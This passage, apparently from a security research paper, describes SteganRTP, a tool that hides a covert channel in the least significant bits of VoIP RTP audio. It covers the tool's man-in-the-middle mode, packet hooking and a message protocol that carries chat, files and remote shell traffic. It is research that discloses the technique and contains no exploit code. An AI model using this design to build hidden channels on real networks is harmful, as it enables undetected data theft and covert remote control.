As such, most implementations of RTP +do not currently use the SRTP profile and instead continue to transmit call +media data in the clear. As will be detailed in full in Section 3.2, this +property of the media channel provides ample opportunity for multiple types +of operational scenarios where unknown third-parties to the legitimate +callers may hijack all or part of the call's media traffic for transmission +of covert communications. Making use of this blatantly insecure property +of RTP is the primary motivation for this research effort. + +1.4) Steganography + +The term steganography originates from the Greek root words ``steganos'' and +``graphein'' which literally mean ``covered writing''. As a sub-discipline of +the academic discipline of information hiding, the primary goal of +steganography is to hide the fact that communication is taking place[7, 8, 9] by +concealing a message within a cover-medium in such a way that an observer can +not discern the presence of the hidden message. + +Conversely, steganalysis is the act of attempting to detect a concealed +message which was hidden via the use of steganographic techniques[8], thus +preventing a steganographer from achieving their primary goal. Common +steganalysis techniques include statistical analysis of the properties of +potential stego-medium, statistical analysis of extracted potential message +data for properties of language, and many others such as specific techniques +that target known steganographic embedding methods. + +1.4.1) Terminology + +The following terminology as used in the discipline of steganography and +steganalysis has been set forth over many years of compounding research[7, 8, +9]. As such, the following terminology will be used consistently within this +research paper: + + 1. Cover-medium - Data within which a message is to be hidden. + 2. Stego-medium - Data within which a message has been hidden. + 3. Message - Data that is or will be hidden within a stego-medium or + cover-medium, respectively. + 4. Redundant Bits - Bits of data in a cover-medium that can be modified + without compromising that medium's integrity. + +1.4.2) Digitally Embedding + +Digitally embedding a message into a cover-medium usually involves three basic +steps. First, the redundant bits of the target cover-medium must be +identified. Second, it must be decided which of the identified redundant bits +are to be utilized. Finally, the bits selected for use must be modified to +store the message data. In many cases, a cover-medium's redundant bits are +likely to be the least-significant bit or bits of each of the encoded data's +word values. + +1.5) Steganography With Audio + +Media formats in general, and audio formats specifically, tend to be very +inaccurate data formats simply because they do not need to be accurate; the +human ear is not very adept at differentiating sounds. As an example, an +orchestra performance which is recorded with two separate recording devices +will produce vastly different recordings when viewed digitally, but will +generally sound the same when played back if they were recorded in a similar +manner. Due to this inherent inaccuracy, changes to an audio bit-stream can +be made so slightly that when played back the human ear won't be able to +distinguish the difference between the cover-medium audio and the stego-medium +audio. + +With many audio formats, the least-significant bit from each audio sample can +be used as the medium's redundant bits for the embedding of message data. 
To +illustrate, assume that an audio file encoded with an 8-bit sample encoding +has the following 8 bytes of data in it, which will be used as cover-data: + +0xb4 0xe5 0x8b 0xac 0xd1 0x97 0x15 0x68 + +In binary this would result in the following bit-stream: + +10110100 11100101 10001011 10101100 11010001 10010111 00010101 01101000 + +In order to hide the message byte value 0xd6, or 11010110 in binary, each +sample word's least-significant bit would be modified to represent all 8 bits +of the message byte: + +10110101 11100101 10001010 10101101 11010000 10010111 00010101 01101000 + +The modifications result in the following 8 bytes of stego-data: + +0xb5 0xe5 0x8a 0xad 0xd0 0x97 0x15 0x68 + +When compared to the original 8 bytes of cover-data, it is noticeable that on +average only half of the bytes of data have actually changed value, however +the resulting stego-data's least-significant bits contain the entire message +byte. It is also noticeable that when utilizing this embedding method with a +cover-medium with these word size properties, the cover-medium must be at +least eight times the size of the message in order to successfully embed the +entire message. + +1.5.1) Previous Research + +Audio Steganography + +Much research has been done in the field of steganography utilizing an audio +cover-medium. Techniques such as using audio to convey messages in both the +human audible and inaudible spectrum as well as various methods for the +digital embedding of information into the audio data itself have all been +explored; so much in fact that many methods are now considered standard. Many +of the most recent implementations cannot be considered to advance the state +of research in the area as they generally only implement the standard methods. + +It is important to note that the significant majority of previous research in +the sub-discipline of audio steganography, however, has focused on static, +unchanging audio data files. Tools such as S-Tools[10], MP3Stego[11], Hide 4 +PGP[12], and many others, are just such implementations, employing standard +embedding methods with WAV, MP3, and VOC audio file cover-mediums, +respectively. Very few practical implementations have been developed that +utilize audio steganography with a cover-medium that is in a flux state or +within streaming or real-time media sessions. + +VoIP Steganography + +A few previous research efforts have been made to employ steganography with +various VoIP technologies. A complete analysis of such efforts identified +prior to embarking upon the research presented in this paper has previously +been provided[13]. In summary, most identified research efforts were utilizing +steganographic techniques but not achieving the primary goal of steganography +or otherwise employing steganographic techniques to accomplish an otherwise +overt goal. + +2) Real-time Steganography + +This paper defines ``real-time'' use of steganography as the utilization of +steganographic techniques to embed message data within an active, or +real-time, media stream. The research and reference implementation presented +herein focuses on VoIP call audio as the active media stream being targeted as +cover-medium. + +Nearly all uses of steganography targeting audio cover-medium in general, or +VoIP cover-medium specifically, that were evaluated prior to performing this +research were found to operate on a target cover-medium as a storage channel +and provided separate ``hide'' and ``retrieve'' modes. 
In addition, most
+cover-medium that were targeted by such implementations were of a static
+nature, such as WAV or MP3 files, or were unidirectional, such as streaming
+stego-audio to a recipient.
+
+A few weeks prior to the research contained herein being initially presented[14]
+at the DEFCON 15[15] hacker conference on August 3rd through 5th, 2007, another
+use of steganography in a real-time fashion was made public via a research
+effort entitled Vo(2)IP[16]. An analysis of this research effort and its
+deficiencies has been included in an updated version of the previously
+mentioned analysis paper[13].
+
+2.1) Context Terminology
+
+The disciplines of steganography and data networking share some common terms
+which have different meanings relative to each discipline. This paper
+discusses research that lies within the realm of both disciplines, and as
+such will use terms that may be confusing when taken out of context. The
+following terms are defined here and used consistently throughout to prevent
+confusion when interpreting the content of this paper.
+
+ 1. Packet - Used in the data networking sense; a data packet which is routed
+    through a network, such as an IP/UDP/RTP packet.
+ 2. Message - Used in the steganography sense; data to be hidden or retrieved.
+
+2.2) RTP Payload Redundant Bits
+
+RTP packet payloads are essentially encoded multimedia data. RTP payloads may
+contain any type of multimedia data; however, this research effort focused
+entirely on audio, specifically audio encoded with the G.711 Codec[17]. Any
+number of audio Codecs can be used to encode the RTP payload, the identifier
+of which is included in the RTP packet's header as the payload type (PT)
+field.
+
+The frequency, locations, and number of redundant bits found within the RTP
+packet's encoded payload are determined by the Codec that is used to encode
+the audio transmitted by an individual packet. The Codec focused on during
+this research, G.711, uses a 1-byte sample encoding and is generally resilient
+to modifications to the least significant bit (LSB)[18] of each sample. Codecs
+with larger samples may provide for one or more bits per sample to be modified
+without any discernible audible change in the encoded audio, which is defined
+as the audio's audible integrity.
+
+2.2.1) Audio Word Size
+
+The data value word size, or sample size in audio terminology, used by various
+audio encoding formats is one factor in determining the amount of available
+space within the cover-medium for embedding a message. Generally only the
+least significant bit of each word value can be expected to be modifiable
+without any perceptible impact to audible integrity. Thus, only half the
+amount of available space in an audio cover-medium encoded in a format with a
+16-bit word size will be available in comparison with a cover-medium with an
+8-bit word size.
+
+2.2.2) Common VoIP Audio Codecs
+
+For reference, some common VoIP audio Codecs and their encoding and sample
+properties[19] are listed in the table below.
+
+ +------------+----------+-------------+-------------+------------+
+ | Codec      | Standard | Bit Rate    | Sample Rate | Frame Size |
+ |            | by       | (kb/s)      | (kHz)       | (ms)       |
+ +------------+----------+-------------+-------------+------------+
+ | G.711      | ITU-T    | 64          | 8           | Sampling   |
+ | G.721      | ITU-T    | 32          | 8           | Sampling   |
+ | G.722      | ITU-T    | 64          | 16          | Sampling   |
+ | G.722.1    | ITU-T    | 24/32       | 16          | 20         |
+ | G.723      | ITU-T    | 24/40       | 8           | Sampling   |
+ | G.723.1    | ITU-T    | 5.6/6.3     | 8           | 30         |
+ | G.726      | ITU-T    | 16/24/32/40 | 8           | Sampling   |
+ | G.727      | ITU-T    | variable    |             | Sampling   |
+ | G.728      | ITU-T    | 16          | 8           | 2.5        |
+ | G.729      | ITU-T    | 8           | 8           | 10         |
+ | GSM 06.10  | ETSI     | 13          | 8           | 22.5       |
+ | LPC10      | U.S. Gov | 2.4         | 8           | 22.5       |
+ | Speex (NB) |          | 8, 16, 32   | 2.15 - 24.6 | 30         |
+ | Speex (WB) |          | 8, 16, 32   | 4 - 44.2    | 34         |
+ | iLBC       |          | 8           | 13.3        | 30         |
+ | DoD CELP   | U.S. DoD | 4.8         |             | 30         |
+ | EVRC       | 3GPP2    | 9.6/4.8/1.2 | 8           | 20         |
+ | DVI        | IMA      | 32          | Variable    | Sampling   |
+ | L16        |          | 128         | Variable    | Sampling   |
+ +------------+----------+-------------+-------------+------------+
+  Common VoIP Audio Codecs
+
+2.2.3) G.711 (alaw/ulaw)
+
+The G.711 audio Codec is a fairly straight-forward sample-based encoding. It
+encodes audio as a linear grouping of 8-bit audio samples arranged in the
+order in which they were sampled.
+
+Throughput
+
+Utilizing the LSB of every sample in a G.711 encoded RTP payload, which is
+commonly 160 bytes in size, a total of 20 bytes of message data can be
+successfully embedded in each packet. Given an average of 50 packets per
+second in each direction, this results in approximately 1,000 bytes per
+second of message data throughput in each direction of the full-duplex
+covert channel.
+
+2.3) Identified Problems and Challenges
+
+Many problems and challenges that arise when considering the use of
+steganography with RTP stem from properties of the underlying transport
+mechanism, the nature of real-time audio, or the RTP protocol itself. The
+following sections outline various problems and challenges that were
+identified when attempting to use steganography with RTP.
+
+2.3.1) Unreliable Transport
+
+One of the most significant challenges to utilizing RTP packet payloads as
+cover-medium is that RTP generally employs UDP as its underlying transport
+protocol. This is appropriate for a streaming multimedia protocol; however,
+it is less than ideal for a reliable covert communications channel. UDP is a
+datagram messaging protocol which is considered connectionless and unreliable[5].
+As such, each packet's successful delivery and order of arrival is not
+guaranteed. Any message data which is split across multiple RTP cover-packets
+may arrive out of order or not arrive at all.
+
+2.3.2) Cover-Medium Size Limitations
+
+The RTP protocol, being designed for ``real-time'' transport of media, behaves
+like a streaming protocol should. RTP datagram packets are relatively small
+and there are usually tens to hundreds of packets sent per second in the
+process of relaying audio between two peers. Additionally, different audio
+Codecs provide for different encoded audio sample sizes, resulting in a
+variable amount of available space for embedding which is dependent upon which
+Codec the audio for any individual RTP packet is encoded with.
Due to the +small size of these packets and the common constraint among many +steganographic embedding methods which limits the amount of data that is able +to be embedded to a fraction of the size of the cover-medium, a very limited +amount of space is actually available for the embedding of message data. As +such, large message data will inevitably be required to be split across +multiple cover-packets and thus must be reassembled at its destination. + +2.3.3) Latency + +RTP is, by design, extremely susceptible to media degradation due to packet +latency. As such, any processing overhead from the embedding of message data +into the cover-medium or delay due to inspection of potential cover-medium +packets may have a noticeable impact on the end-user's quality of experience. +When manipulating an RTP stream between two endpoints that are expecting +packet delivery in a timely manner, a steganographic system cannot be overly +invasive when packets are not needed for embedding and must be efficient at +its task when they are. + +2.3.4) Tracking of RTP Streams + +In normal operation, RTP establishes two packet streams to form a session +between two endpoints. Each endpoint uses one stream to send multimedia data +to the other, thus achieving full-duplex communication via two unidirectional +packet streams. When identifying an RTP session to be utilized as +cover-medium for a full-duplex covert communications channel, the two paired +streams must be correctly identified and tracked. + +2.3.5) Raw vs. Compressed Audio + +It is important to consider that audio being transported via RTP may be +compressed. To successfully embed message data into a cover-medium, it is +generally required that it is performed against the raw data so as to properly +identify and utilize the cover-medium's redundant bits. As such, +identification of compressed cover-medium, decompression, modification of the +raw data, and then re-compression may be required. + +Lossy vs. Lossless Compression + +When considering the potential use of compression within the cover-medium, it +is also important to consider the type of compression used. Most compression +methods can be categorized into two types; lossy compression and lossless +compression. + +If the compression method used is of the lossy type, the integrity of any +message data embedded into the cover-medium prior to compression may be +compromised when the stego-medium is uncompressed as some of the original +audio data may be lost. Due to this property of lossy compression types, +audio data compressed in this manner may not be appropriate for use as +cover-medium without additional safeguards against this loss. + +2.3.6) Media Gateway Audio Modifications + +RTP, as a protocol being potentially routed across multiple networks by its +underlying transport, network, and data-link protocols, may also be routed or +gatewayed along its path by other intermediary telephony devices like Media +Gateways or Back-to-Back User Agent (B2BUA) devices. At such transition +points, the media being transported may undergo potential modification. Some +of these modifications include translation from one audio Codec to another, +down-sampling, normalization, or mixing with other audio streams. Invasive +changes such as these can potentially impact the integrity of any message data +embedded within the stego-medium. 
+ +Audio Codec Conversion + +Codec conversion takes place when an intermediary device such as a Media +Gateway is providing translation services for two endpoints that support +disparate sets of Codecs. For example, one endpoint may support GSM encoding +of audio and the other only G.711 or Speex encoding. Unless an intermediary +translator is involved, these two devices cannot directly establish an RTP +audio channel. The intermediary device essentially translates audio from the +Codec being used by one endpoint to a Codec that can be understood by the +other. Audio Codec conversion may also take place if the inherent latency or +Quality-of-Service (QoS) properties of the transport network on either side of +the intermediary device requires a lighter-weight Codec. + +Down-sampling and Normalization + +Down-sampling and normalization may be performed on an audio payload to bring +the properties of the audio such as volume and background white-noise more in +line with the other party's audio stream. Occasionally this task is handled +by the endpoint devices when playing the media for the user. In that scenario +the integrity of the stego-medium will likely remain intact as the audio +payload isn't actually modified in transit. However, there are scenarios +where an intermediary media device may actually re-sample or otherwise modify +the payload of the media stream specifically to alter its audible properties. +In these cases, the integrity of the stego-medium may become compromised. + +Audio Stream Mixing + +When performing conferencing or other types of multi-party calls, it is +possible that multiple party's audio streams may be mixed together. Such +invasive modification of the audio will almost certainly compromise the +integrity of the stego-medium. + +2.3.7) Mid-session Audio Codec Change + +Most VoIP signaling protocols provide methods for VoIP endpoints to change the +audio encoding method on the fly. Due to this functionality an RTP session +may begin using one Codec and then switch to a completely different Codec +mid-session. This functionality may be used for a variety of reasons +including QoS metrics not being met, inclusion of a new endpoint in the call +that does not support the original Codec, or any number of other reasons. Due +to this dynamic nature, any steganographic system attempting to embed data +into an RTP stream's packets must be able to dynamically adjust its message +embedding algorithm to accommodate different Codecs' various sample sizes and +layout within the RTP packet payload. + +3) Reference Implementation: SteganRTP + +3.1) Design Goals + +The goals set forth for the SteganRTP reference implementation[20] are described +in the following subsections. + +3.1.1) Achieve Steganography + +As stated in Section 1.4, the primary goal of steganography is to hide the fact +that communication is taking place. Therefore, it is the primary goal of this +reference implementation to prevent indication to a third-party observer of +the RTP audio stream that anything other than the overt communication between +the two RTP endpoints is taking place. + +3.1.2) Full-Duplex Communications Channel + +This reference implementation intends to achieve a full-duplex covert +communication channel between the two RTP endpoints, mirroring the utility of +RTP itself. This will be accomplished through the use of both RTP streams +that comprise an RTP session. 
By utilizing both RTP streams within the +session, either application will be able to both send and receive data +simultaneously. + +3.1.3) Compensate for Unreliable Transport + +This reference implementation intends to compensate for the unreliable +transport inherent to RTP. This will be accomplished by providing a data +sequencing, tracking, and resending mechanism. + +3.1.4) Identical User Experience Regardless of Mode of Operation + +This reference implementation intends to provide two distinct modes of +operation. The first mode of operation is described as the SteganRTP +application running locally on the same host as the RTP endpoint. The second +mode of operation is described as the SteganRTP application running on an +intermediary host along the route from one RTP endpoint to another. This +intermediary host must be forwarding or bridging the RTP traffic as an active +man-in-the-middle (MITM). The reference implementation intends for the user +experience of running the SteganRTP application to be identical regardless of +the mode of operation. This will be accomplished by interfacing directly with +the host operating system's network stack in order to hook the desired packet +streams. + +3.1.5) Multi-type Data Transfer + +The reference implementation intends to provide simultaneous transfer of +multiple types of data, such as text chat, file transfer, and remote shell +access. This will be accomplished by providing type indication and formatting +for each type of supported data being transferred. + +3.2) Operational Architecture + +As mentioned in Section 3.1.4 above, the application will operate in one of two +distinct modes: the application running locally on the same host as the RTP +endpoint or the application running as an active MITM . It is not intended +that the two SteganRTP applications which are communicating be operating in +the same mode. Thus, a mixed-mode operation such as is described +below is entirely possible. + +It is important to note that the SteganRTP application is only required to be +bridging or forwarding the RTP stream considered outbound from the closer RTP +endpoint destined for the more remote RTP endpoint. Conversely, the +application is only required to be able to observe the inbound RTP stream +flowing in the other direction as it does not need to invasively modify any +packets from the inbound stream. + +3.3) Application Flow + +When the SteganRTP application begins it performs an initialization phase by +setting up internal memory structures and configuration information from the +command-line. Next, it observes network traffic until it identifies an RTP +session which falls within the constraints specified by the user on the +command-line. These constraints are how the user controls selection of the +RTP sessions between specific RTP endpoints to utilize as cover-medium and, by +virtue, which remote SteganRTP application to communicate with. After +identifying an RTP session, SteganRTP inserts hooks into the host's network +stack in order to receive the desired packets upon transmission or arrival, or +both if the SteganRTP application is operating in the active MITM scenario. +From these hooks a packet queue is created which the application then reads +individual packets from. Whether the packet is considered inbound or outbound +determines the further course of the application. 
Whether a packet is considered inbound or outbound is determined by which
+RTP endpoint network address and port is defined as ``local'' or
+``remote'', which in the case of the active MITM operation can be inferred
+as ``near'' or ``far'', respectively.
+
+When an inbound RTP packet is read from the queue, it is copied for the
+application's use and the original packet is immediately sent as the
+SteganRTP application does not need to invasively modify it. All received
+inbound packets are assumed to be potential cover-medium for the covert
+channel, so potential message data is then extracted from each inbound
+packet. The potential message data is then decrypted, and the result is
+checked for a valid checksum value in the potential message's header. If
+the checksum is valid, the message data is sent to the message handler
+component for processing.
+
+When an outbound RTP packet is read from the queue, the SteganRTP
+application immediately polls its outbound data queues for any message data
+waiting to be sent. If there is no data waiting to be sent, the packet is
+immediately sent unmodified. If there is message data waiting to be sent,
+as much of that data as will fit into the cover-medium packet's payload is
+read from its file descriptor, packaged as a formatted message, encrypted,
+and then steganographically embedded into the RTP packet's payload. The
+modified RTP packet is then sent in place of the original RTP packet.
+
+3.3.1) Initialization
+
+Upon start-up, SteganRTP first initializes various memory structures such
+as message caches, configuration settings, and an RTP session context
+structure.
+
+The most notable task performed during the initialization phase is the
+computation of keying information used by various components. The method
+chosen for creation of this keying information is to create a 20-byte
+SHA-1[21] hash of a user-supplied shared secret text string. Due to the
+result of this operation being used as keying information by various
+components of the overall SteganRTP system, this shared secret must be
+provided to both SteganRTP applications that wish to communicate with each
+other.
+
+The 20-byte result of the SHA-1 hash function against the user-supplied
+shared secret is defined here as the keyhash and described by the equation
+below, where f represents the SHA-1 hash function.
+
+keyhash = f( sharedsecret )
+
+SHA-1 Collision Irrelevance
+
+In February of 2005, a group of Chinese researchers developed an algorithm
+for finding SHA-1 hash collisions faster than brute force. They proved it
+possible to find collisions in the full 80-step SHA-1 in less than 2^69
+hash operations, about 2,000 times faster than the 2^80 hash operation
+theoretical bound for brute force. The paper also includes search attacks
+for finding collisions in the 58-step SHA-1 in 2^33 hash operations and
+SHA-0 in 2^39 hash operations. The biggest impact that this discovery has
+pertains to the use of SHA-1 hashes in digital signatures and technologies
+where one of the pre-images is known. By searching for a second pre-image
+which hashes to the same value as the original, a digital signature for the
+original may theoretically be used to authenticate a forgery.
+
+The use of SHA-1 by the SteganRTP reference implementation is solely to
+compute a bit-pad of keying information with a longer, seemingly more
+random bit distribution than what is likely provided directly by user input
+as the shared secret.
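+
+As a concrete illustration, this keying step amounts to a single SHA-1 pass
+over the shared secret. The sketch below uses OpenSSL's SHA1() for brevity;
+the reference implementation may derive the hash with a different SHA-1
+library, so treat the specific call as an assumption.
+
+/* keyhash = SHA-1( shared secret ); a minimal sketch, not SteganRTP code */
+#include <stdio.h>
+#include <string.h>
+#include <openssl/sha.h>        /* assumed SHA-1 provider */
+
+static void derive_keyhash(const char *secret,
+                           unsigned char keyhash[SHA_DIGEST_LENGTH])
+{
+    SHA1((const unsigned char *)secret, strlen(secret), keyhash);
+}
+
+int main(void)
+{
+    unsigned char keyhash[SHA_DIGEST_LENGTH];   /* 20 bytes */
+
+    derive_keyhash("example shared secret", keyhash);
+    for (int i = 0; i < SHA_DIGEST_LENGTH; i++)
+        printf("%02x", keyhash[i]);
+    printf("\n");
+    return 0;
+}
+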
The result of the SHA-1 hash of the user's shared secret is +used directly as keying information. In order to launch a collision attack +against the hash used as the bit-pad, the attacker would have to either obtain +the original user-supplied shared secret or the hash itself. Due to the hash +being used directly as keying information, the possession of it by an attacker +has already compromised the security of the data being obfuscated with it; +computing one or more additional pre-images which hash to a collision provides +no additional value for the attacker. + +3.3.2) RTP Session Identification + +RTP session identification is performed using libfindrtp. libfindrtp is a C +library that identifies sessions between two endpoints by observing VoIP +signaling traffic and watching for call set-up. Constraints can be passed to +the library to limit session identification to a single endpoint, specific +multiple endpoints, or even specific multiple endpoints using specific UDP +ports. These constraints are passed through to libfindrtp from the input +provided to the SteganRTP application via the command-line. At the time of +this writing, libfindrtp supports session identification via the Session +Initiation Protocol (SIP)[1] and Cisco Skinny Call Control Protocol (SCCP)[3] +VoIP signaling protocols. + +3.3.3) Hooking Packets + +The SteganRTP application makes use of NetFilter[23] hook points in order to +receive both inbound and outbound RTP session packets. The Linux kernel is +instructed to pass specific packets to an application by inserting an iptables +rule describing the packets with a target of QUEUE. Packets which match a +rule with a target of QUEUE are queued to be read by a registered NetFilter +user-space queuing agent. Access to this queue is provided to the SteganRTP +application via an API provided by the NetFilter C library libipq. An +iptables rule used to hook packets via this interface may be inserted at any +of the NetFilter hook points. + +For the most beneficial use by the SteganRTP application, packets must be +hooked at points where their integrity as stego-medium is maintained. Thus, +inbound packets are hooked at the PRE-ROUTING hook point and outbound packets +are hooked at the POST-ROUTING hook point. In this manner, incoming packets +are able to be processed by the SteganRTP application prior to any potential +modification by the local system and outbound packets are able to be modified +by SteganRTP after the local system is essentially finished with them. + +SteganRTP registers itself as a user-space queuing agent for NetFilter via +libipq. SteganRTP then creates two iptables rules in the NetFilter engine +with targets of QUEUE. The first rule matches the inbound RTP stream at the +PRE-ROUTING hook point. The second rule matches the outbound RTP stream at +the POST-ROUTING hook point. + +3.3.4) Reading Packets + +Using the packet hooks described in the previous section, SteganRTP is then +able to read packets from the provided packet queue, determine if they are +considered inbound or outbound packets, and pass them to the appropriate +processing functions. The processing functions may then analyze them, modify +them if needed, place modified versions back into the queue in place of the +original, and instruct the queue to accept the packet for further routing. + +3.3.5) Inbound Processing + +As outlined above, the basic steps for inbound packet processing are as +follows: + + 1. Immediately accept the packet for routing. + 2. Extract potential message data. 
+ 3. Decrypt potential message data. + 4. Verify the potential message header's checksum. + 5. Send valid messages to the message handler. + +3.3.6) Outbound Processing + +As outlined above, the basic steps for outbound packet processing are as +follows: + + 1. Poll for message data waiting to be sent. + 2. If there is no message data waiting, immediately send the packet and return. + 3. Create a new formatted message with header based on the properties of the + RTP packet who's payload is being used as cover-medium. + 4. Read as much of the waiting data as will fit in the formatted message. + 5. Encrypt the message. + 6. Embed the message into the RTP payload cover-medium. + 7. Send the modified RTP packet in place of the original via the NetFilter + user-space queue. + +3.3.7) Session Timeout + +In the event that no RTP packets are available in the NetFilter queue for a +period of time, all session information is dropped and process flow returns to +the RTP session identification phase to locate a new session for use. + +In the event that RTP packets are being received but no valid messages have +been received for a period of time, the SteganRTP application attempts to +solicit a response from the remote application. If these solicitations have +failed by the timeout period, all session information is dropped and process +flow returns to the RTP session identification phase to locate a new session +for use. + +3.4) Communication Protocol Specification + +The SteganRTP communication protocol makes use of formatted messages which are +steganographically embedded into the payloads of individual RTP packets. This +steganographic embedding creates the covert channel within which the +communication protocol described in the following sections operates. + +3.4.1) The cover medium: RTP Packet + +Below, reproduced verbatim from the RTP specification[4], describes the +RTP packet header. Of special interest are the payload type (PT), sequence +number, and timestamp fields, all of which will become relevant when building, +encrypting, and steganographically embedding the message data into the +packet's payload. The remainder of the packet contains an optional number of +header extensions which are irrelevant to the SteganRTP communication +protocol, and finally the encoded media data, otherwise known as the RTP +packet's payload, which will be utilized by SteganRTP as cover-medium. + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +|V=2|P|X| CC |M| PT | sequence number | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| timestamp | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| synchronization source (SSRC) identifier | ++=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ +| contributing source (CSRC) identifiers | +| .... | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + +The 7-bit payload type field indicates the audio Codec used to encode the +payload. The 16-bit sequence number field is a standard incrementing sequence +number. The 32-bit timestamp field describes the sampling instant of the +first sample in the payload, and the remaining packet data is the audio +payload as encoded by the indicated Codec. + +3.4.2) Message Format + +The format of the messages that the SteganRTP applications use to communicate +with each other is described in the following sections. 
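+
+For reference while reading these sections, the fixed portion of a message
+can be represented as the C structure below. The field names are
+illustrative only, the widths are taken from the descriptions that follow,
+and byte ordering on the wire is not addressed by this sketch.
+
+#include <stdint.h>
+
+/* SteganRTP message header; the variable-length Value (body) of Length
+ * bytes immediately follows these eight bytes. */
+typedef struct steg_msg_hdr {
+    uint32_t checksum_id;   /* Checksum / ID used to validate the message */
+    uint16_t sequence;      /* incrementing message sequence number */
+    uint8_t  type;          /* message type (see the type table below) */
+    uint8_t  length;        /* length of the Value field, in bytes */
+} steg_msg_hdr;
+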
Below +describes the core message format of all types of SteganRTP formatted +messages. This format consists of two fields, the Checksum / ID and Sequence +fields followed by a standard Type-Length-Value (TLV)[24] structure. The Checksum +/ ID, Sequence, Type, and Length fields comprise the message header, while the +Value field is considered the message body, or payload. + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| Checksum / ID | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| Sequence | Type | Length | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| Value (Type-Defined Body) | +! ! +. . + +The 32-bit Checksum / ID field contains a hash value which is used to identify +whether or not a potential message that is extracted from the payload of an +inbound RTP packet is indeed a valid SteganRTP communication protocol message. +The hashword[25] function is used to compute this hash. The function's two +primary operands consist of the keying information defined as keyhash in +Section 3.3.1 and the sum of the message's Sequence, Type, and Length header +fields. This value is defined as checksumid and is described by Equation +below. + + +checksumid = hashword( keyhash, (Sequence + Type + Length) ) + + +The verification of extracted potential messages is required due to the fact +that some packets in the inbound RTP stream may not contain SteganRTP messages +if there was no outbound data waiting to be sent by the remote application +when the RTP packet in question traversed it. The hash function used to +compute this checksum value incorporates the keyhash so as not to be +computable solely from message data, which would allow an observer to also +verify that a message is embedded within the RTP payload. + +The 16-bit Sequence field is a standard incrementing sequence number, the +8-bit Type field indicates what type of message it is, and the 8-bit Length +field indicates the length, in bytes, of the Value field. The Value field +contains the message's payload. + +3.4.3) Message Types + +The currently defined message types are listed in the table below. + + +----+---------------------+ + | ID | Type | + +----+---------------------+ + | 0 | Reserved | + | 1 | Control | + | 10 | Chat Data | + | 11 | File Data | + | 12 | Shell Input Data | + | 13 | Shell Output Data | + +----+---------------------+ + +Control Messages + +Below describes the format of SteganRTP control messages. Control +messages are used to send non-user data to the remote SteganRTP application to +convey operational information such as requesting a message resend or +indicating that a file is about to be sent and providing that file's context +information. Control messages consist of one or more stacked TLV structures +and are not required to be 32-bit aligned. + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| Control Type | Length | Value | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | +! ! +. . ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| Control Type | Length | Value | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | +! ! +. . + +The 8-bit Control Type field indicates the type of control data contained in +the TLV structure whereas the 8-bit Length field indicates the size, in bytes, +of the Value field. The Value field contains the control data of the +indicated type. 
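+
+Since control messages are simply stacked 8-bit-Type / 8-bit-Length TLV
+structures, a receiver can walk them with a small loop such as the sketch
+below. This illustrates the layout described above rather than code from
+the reference implementation, and the callback type is invented.
+
+#include <stdint.h>
+#include <stddef.h>
+
+typedef void (*control_tlv_cb)(uint8_t type, uint8_t len, const uint8_t *val);
+
+/* Walk the stacked TLVs in a Control message body of body_len bytes,
+ * invoking cb once per TLV; returns -1 if a TLV runs past the end. */
+static int walk_control_tlvs(const uint8_t *body, size_t body_len,
+                             control_tlv_cb cb)
+{
+    size_t off = 0;
+
+    while (off + 2 <= body_len) {
+        uint8_t type = body[off];
+        uint8_t len  = body[off + 1];
+
+        if (off + 2 + len > body_len)
+            return -1;                  /* truncated TLV */
+        cb(type, len, body + off + 2);
+        off += 2 + (size_t)len;
+    }
+    return 0;
+}
+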
+ +Control Message Types + +The currently defined control message types are listed in the table below. + + +----+---------------+ + | ID | Type | + +----+---------------+ + | 0 | Reserved | + | 1 | Echo Request | + | 2 | Echo Reply | + | 3 | Resend | + | 4 | Start File | + | 5 | End File | + +----+---------------+ + +Type 1: Echo Request + +The Echo Request control message is used to prompt the remote SteganRTP +application for a response, allowing the local application making the request +to determine if the remote application is still present and communicating. +This message is sent when a session inactivity timeout limit is approaching. +The format of an Echo Request control message: + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +| 1 | 2 | Seq | Payload | ++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + +The Control Type field's value is 1, indicating that it is an Echo Request +control message, and the Length field's value is 2, indicating the 2-byte +control message payload. The control message payload consists of an 8-bit Seq +field which contains a standard incrementing sequence number specific to Echo +Requests, and an 8-bit Echo Request Payload, which contains a random +bit-string. The Seq value is used to correlate sent Echo Request messages +with received Echo Reply messages and the Payload field received in an Echo +Reply message must match the random bit-string sent in its corresponding Echo +Request 